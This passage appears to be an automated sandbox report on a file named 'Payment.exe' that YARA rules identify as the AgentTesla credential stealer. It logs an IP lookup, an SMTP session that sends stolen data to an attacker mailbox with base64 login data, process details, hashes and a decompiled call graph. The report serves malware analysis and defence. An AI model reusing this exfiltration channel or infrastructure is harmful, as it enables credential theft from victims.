                                                        Apr 26, 2024 10:06:17.399077892 CEST44349725104.26.12.205192.168.2.5
                                                        Apr 26, 2024 10:06:17.399143934 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:17.460120916 CEST49725443192.168.2.5104.26.12.205
                                                        Apr 26, 2024 10:06:20.920599937 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:21.118241072 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:21.118336916 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:21.343420029 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:21.343740940 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:21.540158033 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:21.540323019 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:21.554753065 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:21.754160881 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:21.760410070 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:21.962855101 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:21.963152885 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.161001921 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:22.161571980 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.381539106 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:22.381747007 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.579458952 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:22.580286026 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.580369949 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.580415010 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.580446959 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:06:22.776880026 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:22.776910067 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:22.909761906 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:06:22.960968018 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:07:59.355168104 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:07:59.552514076 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:07:59.552598953 CEST58749727208.91.198.143192.168.2.5
                                                        Apr 26, 2024 10:07:59.552798986 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:07:59.552916050 CEST49727587192.168.2.5208.91.198.143
                                                        Apr 26, 2024 10:07:59.749404907 CEST58749727208.91.198.143192.168.2.5
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 26, 2024 10:06:16.579399109 CEST6318553192.168.2.51.1.1.1
                                                        Apr 26, 2024 10:06:16.705029964 CEST53631851.1.1.1192.168.2.5
                                                        Apr 26, 2024 10:06:18.729578018 CEST5422353192.168.2.51.1.1.1
                                                        Apr 26, 2024 10:06:19.726918936 CEST5422353192.168.2.51.1.1.1
                                                        Apr 26, 2024 10:06:20.742439985 CEST5422353192.168.2.51.1.1.1
                                                        Apr 26, 2024 10:06:20.918672085 CEST53542231.1.1.1192.168.2.5
                                                        Apr 26, 2024 10:06:20.918699980 CEST53542231.1.1.1192.168.2.5
                                                        Apr 26, 2024 10:06:20.918715000 CEST53542231.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Apr 26, 2024 10:06:16.579399109 CEST192.168.2.51.1.1.10x418bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:18.729578018 CEST192.168.2.51.1.1.10x47a0Standard query (0)smtp.italiacanda-it.comA (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:19.726918936 CEST192.168.2.51.1.1.10x47a0Standard query (0)smtp.italiacanda-it.comA (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.742439985 CEST192.168.2.51.1.1.10x47a0Standard query (0)smtp.italiacanda-it.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 26, 2024 10:06:07.769506931 CEST1.1.1.1192.168.2.50xb40aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Apr 26, 2024 10:06:07.769506931 CEST1.1.1.1192.168.2.50xb40aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:08.419193983 CEST1.1.1.1192.168.2.50x6d5No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:08.419193983 CEST1.1.1.1192.168.2.50x6d5No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:16.705029964 CEST1.1.1.1192.168.2.50x418bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:16.705029964 CEST1.1.1.1192.168.2.50x418bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:16.705029964 CEST1.1.1.1192.168.2.50x418bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918672085 CEST1.1.1.1192.168.2.50x47a0No error (0)smtp.italiacanda-it.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918672085 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918672085 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918672085 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918672085 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918699980 CEST1.1.1.1192.168.2.50x47a0No error (0)smtp.italiacanda-it.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918699980 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918699980 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918699980 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918699980 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918715000 CEST1.1.1.1192.168.2.50x47a0No error (0)smtp.italiacanda-it.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918715000 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918715000 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918715000 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                        Apr 26, 2024 10:06:20.918715000 CEST1.1.1.1192.168.2.50x47a0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                        • api.ipify.org
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549725104.26.12.2054435648C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-26 08:06:17 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-04-26 08:06:17 UTC211INHTTP/1.1 200 OK
                                                        Date: Fri, 26 Apr 2024 08:06:17 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 15
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 87a512961a10875c-MIA
                                                        2024-04-26 08:06:17 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                                        Data Ascii: 102.129.152.220


                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Apr 26, 2024 10:06:21.343420029 CEST58749727208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                        Apr 26, 2024 10:06:21.343740940 CEST49727587192.168.2.5208.91.198.143EHLO 093954
                                                        Apr 26, 2024 10:06:21.540323019 CEST58749727208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                        250-PIPELINING
                                                        250-SIZE 41648128
                                                        250-VRFY
                                                        250-ETRN
                                                        250-STARTTLS
                                                        250-AUTH PLAIN LOGIN
                                                        250-AUTH=PLAIN LOGIN
                                                        250-ENHANCEDSTATUSCODES
                                                        250-8BITMIME
                                                        250-DSN
                                                        250 CHUNKING
                                                        Apr 26, 2024 10:06:21.554753065 CEST49727587192.168.2.5208.91.198.143AUTH login c25wc3NAaXRhbGlhY2FuZGEtaXQuY29t
                                                        Apr 26, 2024 10:06:21.754160881 CEST58749727208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                        Apr 26, 2024 10:06:21.962855101 CEST58749727208.91.198.143192.168.2.5235 2.7.0 Authentication successful
                                                        Apr 26, 2024 10:06:21.963152885 CEST49727587192.168.2.5208.91.198.143MAIL FROM:<snpss@italiacanda-it.com>
                                                        Apr 26, 2024 10:06:22.161001921 CEST58749727208.91.198.143192.168.2.5250 2.1.0 Ok
                                                        Apr 26, 2024 10:06:22.161571980 CEST49727587192.168.2.5208.91.198.143RCPT TO:<snpss@italiacanda-it.com>
                                                        Apr 26, 2024 10:06:22.381539106 CEST58749727208.91.198.143192.168.2.5250 2.1.5 Ok
                                                        Apr 26, 2024 10:06:22.381747007 CEST49727587192.168.2.5208.91.198.143DATA
                                                        Apr 26, 2024 10:06:22.579458952 CEST58749727208.91.198.143192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                        Apr 26, 2024 10:06:22.580446959 CEST49727587192.168.2.5208.91.198.143.
                                                        Apr 26, 2024 10:06:22.909761906 CEST58749727208.91.198.143192.168.2.5250 2.0.0 Ok: queued as 4529FB80093
                                                        Apr 26, 2024 10:07:59.355168104 CEST49727587192.168.2.5208.91.198.143QUIT
                                                        Apr 26, 2024 10:07:59.552514076 CEST58749727208.91.198.143192.168.2.5221 2.0.0 Bye

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:10:06:13
                                                        Start date:26/04/2024
                                                        Path:C:\Users\user\Desktop\Payment.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Payment.exe"
                                                        Imagebase:0xad0000
                                                        File size:1'062'912 bytes
                                                        MD5 hash:872FC876D25908A93236DCF98E09E3DE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:10:06:14
                                                        Start date:26/04/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Payment.exe"
                                                        Imagebase:0xea0000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3389464276.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3389464276.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:4%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:4.5%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:43
                                                          execution_graph 99053 ad107d 99058 ad71eb 99053->99058 99055 ad108c 99089 af2f80 99055->99089 99059 ad71fb __write_nolock 99058->99059 99092 ad77c7 99059->99092 99063 ad72ba 99104 af074f 99063->99104 99070 ad77c7 59 API calls 99071 ad72eb 99070->99071 99123 ad7eec 99071->99123 99073 ad72f4 RegOpenKeyExW 99074 b0ecda RegQueryValueExW 99073->99074 99079 ad7316 Mailbox 99073->99079 99075 b0ecf7 99074->99075 99076 b0ed6c RegCloseKey 99074->99076 99127 af0ff6 99075->99127 99076->99079 99088 b0ed7e _wcscat Mailbox __wsetenvp 99076->99088 99078 b0ed10 99137 ad538e 99078->99137 99079->99055 99082 ad7b52 59 API calls 99082->99088 99083 b0ed38 99140 ad7d2c 99083->99140 99085 b0ed52 99085->99076 99087 ad3f84 59 API calls 99087->99088 99088->99079 99088->99082 99088->99087 99149 ad7f41 99088->99149 99217 af2e84 99089->99217 99091 ad1096 99093 af0ff6 Mailbox 59 API calls 99092->99093 99094 ad77e8 99093->99094 99095 af0ff6 Mailbox 59 API calls 99094->99095 99096 ad72b1 99095->99096 99097 ad4864 99096->99097 99153 b01b90 99097->99153 99100 ad7f41 59 API calls 99101 ad4897 99100->99101 99155 ad48ae 99101->99155 99103 ad48a1 Mailbox 99103->99063 99105 b01b90 __write_nolock 99104->99105 99106 af075c GetFullPathNameW 99105->99106 99107 af077e 99106->99107 99108 ad7d2c 59 API calls 99107->99108 99109 ad72c5 99108->99109 99110 ad7e0b 99109->99110 99111 ad7e1f 99110->99111 99112 b0f173 99110->99112 99177 ad7db0 99111->99177 99182 ad8189 99112->99182 99115 ad72d3 99117 ad3f84 99115->99117 99116 b0f17e __wsetenvp _memmove 99118 ad3f92 99117->99118 99122 ad3fb4 _memmove 99117->99122 99120 af0ff6 Mailbox 59 API calls 99118->99120 99119 af0ff6 Mailbox 59 API calls 99121 ad3fc8 99119->99121 99120->99122 99121->99070 99122->99119 99124 ad7f06 99123->99124 99126 ad7ef9 99123->99126 99125 af0ff6 Mailbox 59 API calls 99124->99125 99125->99126 99126->99073 99129 af0ffe 99127->99129 99130 af1018 99129->99130 99132 af101c std::exception::exception 99129->99132 99185 af594c 99129->99185 99202 af35e1 DecodePointer 99129->99202 99130->99078 99203 af87db RaiseException 99132->99203 99134 af1046 99204 af8711 58 API calls _free 99134->99204 99136 af1058 99136->99078 99138 af0ff6 Mailbox 59 API calls 99137->99138 99139 ad53a0 RegQueryValueExW 99138->99139 99139->99083 99139->99085 99141 ad7d38 __wsetenvp 99140->99141 99142 ad7da5 99140->99142 99144 ad7d4e 99141->99144 99145 ad7d73 99141->99145 99143 ad7e8c 59 API calls 99142->99143 99148 ad7d56 _memmove 99143->99148 99213 ad8087 99144->99213 99147 ad8189 59 API calls 99145->99147 99147->99148 99148->99085 99150 ad7f50 __wsetenvp _memmove 99149->99150 99151 af0ff6 Mailbox 59 API calls 99150->99151 99152 ad7f8e 99151->99152 99152->99088 99154 ad4871 GetModuleFileNameW 99153->99154 99154->99100 99156 b01b90 __write_nolock 99155->99156 99157 ad48bb GetFullPathNameW 99156->99157 99158 ad48da 99157->99158 99159 ad48f7 99157->99159 99161 ad7d2c 59 API calls 99158->99161 99160 ad7eec 59 API calls 99159->99160 99162 ad48e6 99160->99162 99161->99162 99165 ad7886 99162->99165 99166 ad7894 99165->99166 99169 ad7e8c 99166->99169 99168 ad48f2 99168->99103 99170 ad7e9a 99169->99170 99172 ad7ea3 _memmove 99169->99172 99170->99172 99173 ad7faf 99170->99173 99172->99168 99174 ad7fc2 99173->99174 99176 ad7fbf _memmove 99173->99176 99175 af0ff6 Mailbox 59 API calls 99174->99175 99175->99176 99176->99172 99178 ad7dbf __wsetenvp 99177->99178 99179 ad8189 59 API calls 99178->99179 99180 ad7dd0 _memmove 99178->99180 99181 b0f130 _memmove 99179->99181 99180->99115 99183 af0ff6 Mailbox 59 API calls 99182->99183 99184 ad8193 99183->99184 99184->99116 99186 af59c7 99185->99186 99194 af5958 99185->99194 99211 af35e1 DecodePointer 99186->99211 99188 af59cd 99212 af8d68 58 API calls __getptd_noexit 99188->99212 99191 af598b RtlAllocateHeap 99191->99194 99201 af59bf 99191->99201 99193 af5963 99193->99194 99205 afa3ab 58 API calls 2 library calls 99193->99205 99206 afa408 58 API calls 8 library calls 99193->99206 99207 af32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99193->99207 99194->99191 99194->99193 99195 af59b3 99194->99195 99199 af59b1 99194->99199 99208 af35e1 DecodePointer 99194->99208 99209 af8d68 58 API calls __getptd_noexit 99195->99209 99210 af8d68 58 API calls __getptd_noexit 99199->99210 99201->99129 99202->99129 99203->99134 99204->99136 99205->99193 99206->99193 99208->99194 99209->99199 99210->99201 99211->99188 99212->99201 99214 ad8099 99213->99214 99215 ad809f 99213->99215 99214->99148 99216 af0ff6 Mailbox 59 API calls 99215->99216 99216->99214 99218 af2e90 _fprintf 99217->99218 99225 af3457 99218->99225 99224 af2eb7 _fprintf 99224->99091 99242 af9e4b 99225->99242 99227 af2e99 99228 af2ec8 DecodePointer DecodePointer 99227->99228 99229 af2ea5 99228->99229 99230 af2ef5 99228->99230 99239 af2ec2 99229->99239 99230->99229 99288 af89e4 59 API calls _fprintf 99230->99288 99232 af2f58 EncodePointer EncodePointer 99232->99229 99233 af2f07 99233->99232 99234 af2f2c 99233->99234 99289 af8aa4 61 API calls 2 library calls 99233->99289 99234->99229 99237 af2f46 EncodePointer 99234->99237 99290 af8aa4 61 API calls 2 library calls 99234->99290 99237->99232 99238 af2f40 99238->99229 99238->99237 99291 af3460 99239->99291 99243 af9e6f EnterCriticalSection 99242->99243 99244 af9e5c 99242->99244 99243->99227 99249 af9ed3 99244->99249 99246 af9e62 99246->99243 99273 af32f5 58 API calls 3 library calls 99246->99273 99250 af9edf _fprintf 99249->99250 99251 af9ee8 99250->99251 99252 af9f00 99250->99252 99274 afa3ab 58 API calls 2 library calls 99251->99274 99258 af9f21 _fprintf 99252->99258 99277 af8a5d 58 API calls 2 library calls 99252->99277 99254 af9eed 99275 afa408 58 API calls 8 library calls 99254->99275 99257 af9f15 99260 af9f1c 99257->99260 99261 af9f2b 99257->99261 99258->99246 99259 af9ef4 99276 af32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99259->99276 99278 af8d68 58 API calls __getptd_noexit 99260->99278 99262 af9e4b __lock 58 API calls 99261->99262 99265 af9f32 99262->99265 99267 af9f3f 99265->99267 99268 af9f57 99265->99268 99279 afa06b InitializeCriticalSectionAndSpinCount 99267->99279 99280 af2f95 99268->99280 99271 af9f4b 99286 af9f73 LeaveCriticalSection _doexit 99271->99286 99274->99254 99275->99259 99277->99257 99278->99258 99279->99271 99281 af2f9e RtlFreeHeap 99280->99281 99282 af2fc7 __dosmaperr 99280->99282 99281->99282 99283 af2fb3 99281->99283 99282->99271 99287 af8d68 58 API calls __getptd_noexit 99283->99287 99285 af2fb9 GetLastError 99285->99282 99286->99258 99287->99285 99288->99233 99289->99234 99290->99238 99294 af9fb5 LeaveCriticalSection 99291->99294 99293 af2ec7 99293->99224 99294->99293 99295 2142410 99309 2140000 99295->99309 99297 21424c2 99312 2142300 99297->99312 99315 21434f0 GetPEB 99309->99315 99311 214068b 99311->99297 99313 2142309 Sleep 99312->99313 99314 2142317 99313->99314 99316 214351a 99315->99316 99316->99311 99317 ade70b 99320 add260 99317->99320 99319 ade719 99321 add27d 99320->99321 99349 add4dd 99320->99349 99322 b12abb 99321->99322 99323 b12b0a 99321->99323 99352 add2a4 99321->99352 99325 b12abe 99322->99325 99334 b12ad9 99322->99334 99391 b4a6fb 331 API calls __cinit 99323->99391 99327 b12aca 99325->99327 99325->99352 99389 b4ad0f 331 API calls 99327->99389 99330 af2f80 __cinit 67 API calls 99330->99352 99331 add594 99383 ad8bb2 68 API calls 99331->99383 99332 b12cdf 99332->99332 99333 add6ab 99333->99319 99334->99349 99390 b4b1b7 331 API calls 3 library calls 99334->99390 99338 b12c26 99399 b4aa66 89 API calls 99338->99399 99339 add5a3 99339->99319 99349->99333 99400 b3a0b5 89 API calls 4 library calls 99349->99400 99352->99330 99352->99331 99352->99333 99352->99338 99352->99349 99354 ada000 99352->99354 99377 ad88a0 68 API calls __cinit 99352->99377 99378 ad86a2 68 API calls 99352->99378 99379 ad8620 99352->99379 99384 ad859a 68 API calls 99352->99384 99385 add0dc 331 API calls 99352->99385 99386 ad9f3a 59 API calls Mailbox 99352->99386 99387 add060 89 API calls 99352->99387 99388 adcedd 331 API calls 99352->99388 99392 ad8bb2 68 API calls 99352->99392 99393 ad9e9c 60 API calls Mailbox 99352->99393 99394 b26d03 60 API calls 99352->99394 99395 ad81a7 99352->99395 99355 ada01f 99354->99355 99372 ada04d Mailbox 99354->99372 99356 af0ff6 Mailbox 59 API calls 99355->99356 99356->99372 99357 adb5d5 99358 ad81a7 59 API calls 99357->99358 99371 ada1b7 99358->99371 99359 b27405 59 API calls 99359->99372 99361 af0ff6 59 API calls Mailbox 99361->99372 99363 b1047f 99403 b3a0b5 89 API calls 4 library calls 99363->99403 99366 ad81a7 59 API calls 99366->99372 99367 ad77c7 59 API calls 99367->99372 99369 b1048e 99369->99352 99370 af2f80 67 API calls __cinit 99370->99372 99371->99352 99372->99357 99372->99359 99372->99361 99372->99363 99372->99366 99372->99367 99372->99370 99372->99371 99373 b10e00 99372->99373 99375 ada6ba 99372->99375 99376 adb5da 99372->99376 99401 adca20 331 API calls 2 library calls 99372->99401 99402 adba60 60 API calls Mailbox 99372->99402 99405 b3a0b5 89 API calls 4 library calls 99373->99405 99404 b3a0b5 89 API calls 4 library calls 99375->99404 99406 b3a0b5 89 API calls 4 library calls 99376->99406 99377->99352 99378->99352 99380 ad862b 99379->99380 99382 ad8652 99380->99382 99407 ad8b13 69 API calls Mailbox 99380->99407 99382->99352 99383->99339 99384->99352 99385->99352 99386->99352 99387->99352 99388->99352 99389->99333 99390->99349 99391->99352 99392->99352 99393->99352 99394->99352 99396 ad81ba 99395->99396 99397 ad81b2 99395->99397 99396->99352 99408 ad80d7 99397->99408 99399->99349 99400->99332 99401->99372 99402->99372 99403->99369 99404->99371 99405->99376 99406->99371 99407->99382 99409 ad80fa _memmove 99408->99409 99410 ad80e7 99408->99410 99409->99396 99410->99409 99411 af0ff6 Mailbox 59 API calls 99410->99411 99411->99409 99412 b0ff06 99413 b0ff10 99412->99413 99450 adac90 Mailbox _memmove 99412->99450 99700 ad8e34 59 API calls Mailbox 99413->99700 99414 af0ff6 59 API calls Mailbox 99414->99450 99420 af0ff6 59 API calls Mailbox 99437 ada097 Mailbox 99420->99437 99422 adb5d5 99424 ad81a7 59 API calls 99422->99424 99423 ad81a7 59 API calls 99423->99437 99432 ada1b7 99424->99432 99425 b1047f 99704 b3a0b5 89 API calls 4 library calls 99425->99704 99428 ad7f41 59 API calls 99428->99450 99429 ad77c7 59 API calls 99429->99437 99431 b1048e 99433 af2f80 67 API calls __cinit 99433->99437 99435 b27405 59 API calls 99435->99437 99436 b266f4 Mailbox 59 API calls 99436->99432 99437->99420 99437->99422 99437->99423 99437->99425 99437->99429 99437->99432 99437->99433 99437->99435 99438 b10e00 99437->99438 99441 adb5da 99437->99441 99442 ada6ba 99437->99442 99690 adca20 331 API calls 2 library calls 99437->99690 99691 adba60 60 API calls Mailbox 99437->99691 99708 b3a0b5 89 API calls 4 library calls 99438->99708 99709 b3a0b5 89 API calls 4 library calls 99441->99709 99707 b3a0b5 89 API calls 4 library calls 99442->99707 99444 adb416 99699 adf803 331 API calls 99444->99699 99446 ada000 331 API calls 99446->99450 99447 b10c94 99448 ad9df0 Mailbox 59 API calls 99447->99448 99452 b10c86 99448->99452 99449 b10ca2 99706 b3a0b5 89 API calls 4 library calls 99449->99706 99450->99414 99450->99428 99450->99432 99450->99437 99450->99444 99450->99446 99450->99447 99450->99449 99453 adb37c 99450->99453 99458 adb685 99450->99458 99461 adade2 Mailbox 99450->99461 99609 b4c5f4 99450->99609 99641 b37be0 99450->99641 99647 b4bf80 99450->99647 99687 b266f4 99450->99687 99701 b27405 59 API calls 99450->99701 99702 b4c4a7 85 API calls 2 library calls 99450->99702 99452->99432 99452->99436 99697 ad9e9c 60 API calls Mailbox 99453->99697 99455 adb38d 99698 ad9e9c 60 API calls Mailbox 99455->99698 99705 b3a0b5 89 API calls 4 library calls 99458->99705 99461->99432 99461->99452 99461->99458 99462 b100e0 VariantClear 99461->99462 99469 ae2123 99461->99469 99509 b523c9 99461->99509 99547 b4e24b 99461->99547 99550 b4e237 99461->99550 99553 b4474d 99461->99553 99562 b3d2e6 99461->99562 99692 ad9df0 99461->99692 99703 b27405 59 API calls 99461->99703 99462->99461 99710 ad9bf8 99469->99710 99472 af0ff6 Mailbox 59 API calls 99474 ae2154 99472->99474 99475 ae2164 99474->99475 99743 ad5906 60 API calls Mailbox 99474->99743 99744 ad9997 99475->99744 99476 ae2189 99484 ae2196 99476->99484 99783 ad9c9c 59 API calls 99476->99783 99477 b169af 99477->99476 99782 b3f7df 59 API calls 99477->99782 99482 b169f7 99482->99484 99485 b169ff 99482->99485 99723 ad5e3f 99484->99723 99784 ad9c9c 59 API calls 99485->99784 99490 ae219d 99491 b16a11 99490->99491 99492 ae21b7 99490->99492 99494 af0ff6 Mailbox 59 API calls 99491->99494 99493 ad77c7 59 API calls 99492->99493 99495 ae21bf 99493->99495 99496 b16a17 99494->99496 99728 ad56d2 99495->99728 99498 b16a2b 99496->99498 99785 ad59b0 ReadFile SetFilePointerEx 99496->99785 99503 b16a2f _memmove 99498->99503 99786 b3794e 59 API calls 2 library calls 99498->99786 99500 ae21ce 99500->99503 99775 ad9b9c 59 API calls Mailbox 99500->99775 99504 ae21e2 Mailbox 99505 ae221c 99504->99505 99776 ad5dcf 99504->99776 99505->99461 99510 ad77c7 59 API calls 99509->99510 99511 b523e0 99510->99511 99512 ad9997 84 API calls 99511->99512 99513 b523ef 99512->99513 99856 ad7b76 99513->99856 99516 ad9997 84 API calls 99517 b5240f 99516->99517 99518 b5249d 99517->99518 99519 b52429 99517->99519 99520 ad9997 84 API calls 99518->99520 99880 ad9c9c 59 API calls 99519->99880 99522 b524a2 99520->99522 99524 b524b0 99522->99524 99525 b524ce 99522->99525 99523 b5242e 99526 b5248c 99523->99526 99529 b52445 99523->99529 99528 ad9bf8 59 API calls 99524->99528 99532 b524e3 99525->99532 99903 ad9c9c 59 API calls 99525->99903 99527 ad9bf8 59 API calls 99526->99527 99544 b52499 Mailbox 99527->99544 99528->99544 99881 ad79ab 99529->99881 99531 b524f8 99535 ad80d7 59 API calls 99531->99535 99532->99531 99904 ad9c9c 59 API calls 99532->99904 99537 b52512 99535->99537 99536 b52452 99894 ad7c8e 99536->99894 99861 b2f8f2 99537->99861 99541 ad79ab 59 API calls 99542 b52479 99541->99542 99543 ad7c8e 59 API calls 99542->99543 99546 b52487 99543->99546 99544->99461 99905 